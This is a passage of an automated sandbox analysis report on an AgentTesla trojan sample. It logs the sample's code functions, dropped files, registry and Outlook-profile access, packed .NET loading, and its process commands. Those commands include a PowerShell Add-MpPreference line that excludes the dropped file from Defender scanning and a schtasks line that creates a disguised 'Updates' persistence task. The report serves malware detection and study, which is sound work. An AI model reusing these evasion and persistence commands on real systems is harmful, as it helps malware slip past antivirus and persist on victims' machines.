                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeCode function: 0_2_0266E9CF
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeCode function: 0_2_0266E9D0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeCode function: 11_2_014DF080
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeCode function: 11_2_014DF3C8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeCode function: 11_2_014D6120
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeCode function: 11_2_0602BE80
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeCode function: 11_2_0602B718
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeCode function: 11_2_0602C468
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeCode function: 11_2_06020040
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.385148858.0000000003920000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesWVnzfCtbBZkRCtBgshQCNThFFuYPHts.exe4 vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.385148858.0000000003920000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.382792107.00000000004DC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHijriCalen.exe6 vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.388909226.0000000006D30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamePoolWait.dll" vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.383150160.0000000000BDB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000003.357464256.000000000708A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHijriCalen.exe6 vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.389195493.0000000007000000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000000.00000002.383649401.0000000002831000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesWVnzfCtbBZkRCtBgshQCNThFFuYPHts.exe4 vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 00000009.00000000.374569148.00000000001CC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHijriCalen.exe6 vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 0000000B.00000000.380434383.0000000000B9C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHijriCalen.exe6 vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 0000000B.00000002.590122687.00000000012CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 0000000B.00000000.380187525.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesWVnzfCtbBZkRCtBgshQCNThFFuYPHts.exe4 vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, 0000000B.00000002.589629680.0000000000F58000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeBinary or memory string: OriginalFilenameHijriCalen.exe6 vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: gfLnSNNH.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: gfLnSNNH.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeVirustotal: Detection: 36%
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeReversingLabs: Detection: 33%
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeJump to behavior
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gfLnSNNH.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gfLnSNNH" /XML "C:\Users\user\AppData\Local\Temp\tmp20B8.tmp
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gfLnSNNH.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gfLnSNNH" /XML "C:\Users\user\AppData\Local\Temp\tmp20B8.tmp
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeFile created: C:\Users\user\AppData\Roaming\gfLnSNNH.exeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeFile created: C:\Users\user\AppData\Local\Temp\tmp20B8.tmpJump to behavior
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/8@1/1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2996:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3356:120:WilError_01
                    Source: 11.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 11.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.0.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.12.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.400000.12.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                    Data Obfuscation

                    barindex
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe, Form1.cs.Net Code: KeyedCollection System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: gfLnSNNH.exe.0.dr, Form1.cs.Net Code: KeyedCollection System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.440000.0.unpack, Form1.cs.Net Code: KeyedCollection System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.440000.0.unpack, Form1.cs.Net Code: KeyedCollection System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 9.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.130000.1.unpack, Form1.cs.Net Code: KeyedCollection System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 9.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.130000.0.unpack, Form1.cs.Net Code: KeyedCollection System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 9.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.130000.0.unpack, Form1.cs.Net Code: KeyedCollection System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 9.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.130000.2.unpack, Form1.cs.Net Code: KeyedCollection System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 9.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.130000.3.unpack, Form1.cs.Net Code: KeyedCollection System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.b00000.11.unpack, Form1.cs.Net Code: KeyedCollection System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.b00000.3.unpack, Form1.cs.Net Code: KeyedCollection System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.b00000.5.unpack, Form1.cs.Net Code: KeyedCollection System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.b00000.9.unpack, Form1.cs.Net Code: KeyedCollection System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 11.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.b00000.1.unpack, Form1.cs.Net Code: KeyedCollection System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.b00000.2.unpack, Form1.cs.Net Code: KeyedCollection System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 11.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exe.b00000.0.unpack, Form1.cs.Net Code: KeyedCollection System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeCode function: 0_2_02666940 push A14804CEh; iretd
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeCode function: 11_2_0602B660 push es; ret
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeStatic PE information: 0xA6E9CACE [Fri Sep 27 08:07:42 2058 UTC]
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.83655168109
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.83655168109
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeFile created: C:\Users\user\AppData\Roaming\gfLnSNNH.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gfLnSNNH" /XML "C:\Users\user\AppData\Local\Temp\tmp20B8.tmp
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.11269.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
